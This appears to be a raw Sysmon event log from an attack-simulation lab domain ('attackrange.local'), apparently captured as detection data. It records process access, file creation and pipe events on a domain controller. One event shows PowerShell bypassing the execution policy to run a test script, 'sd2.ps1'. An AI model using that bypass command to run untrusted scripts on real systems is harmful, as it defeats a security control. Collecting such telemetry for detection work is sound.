07:57:45.989{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.973{466BC892-F5F9-60EB-8A7D-00000000CF01}86124580C:\Windows\system32\conhost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:45.942{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.931{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D509E413A863FC1975A7F2FD95451C,SHA256=2297C29182E1ACA353BE9E021CA9D8805F1B164749659BC0D187BBF3C11A46FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:45.086{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6517744F7CAE544EEA1C02EF7905595,SHA256=C3E2A9DE756A4CD992095BD508129E739E2D28450291913F2581A49D2792E46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:46.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=808DAA861430D7EB33D354347DF0B5AD,SHA256=0385E4A3520D38DF1B585FCD6CC1F78A7CE3C4C009DDD0D8F430864A63A52AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC64A4ED38ECE062477132436226471,SHA256=2A5F85EE8475D75E911B1B54E5CE775A9A6F620927A4BCB5145BCE6F4FF3A054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBA7883246AC61F6D7295D34998F7D07,SHA256=30AA5FE32C2CD21B9BDD15F39C69CE8ED122340156963215DFB535027A087624,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.574{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.574{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001051289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.543{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E02031235912F37E5AF3E52DF0DF49,SHA256=1976C95A316743C34E381C4DDDBBAF3668EBA0A091B2180480B224F055213E36,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001051288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:46.512{466BC892-F5F9-60EB-897D-00000000CF01}1072\PSHost.132705502659312887.1072.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.443{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_spq1gdrt.cr0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.443{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_md53iyei.q4n.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.408{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_md53iyei.q4n.ps12021-07-12 07:57:46.407 10341000x80000000000000001051284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.343{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e572b.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.243{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.211{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 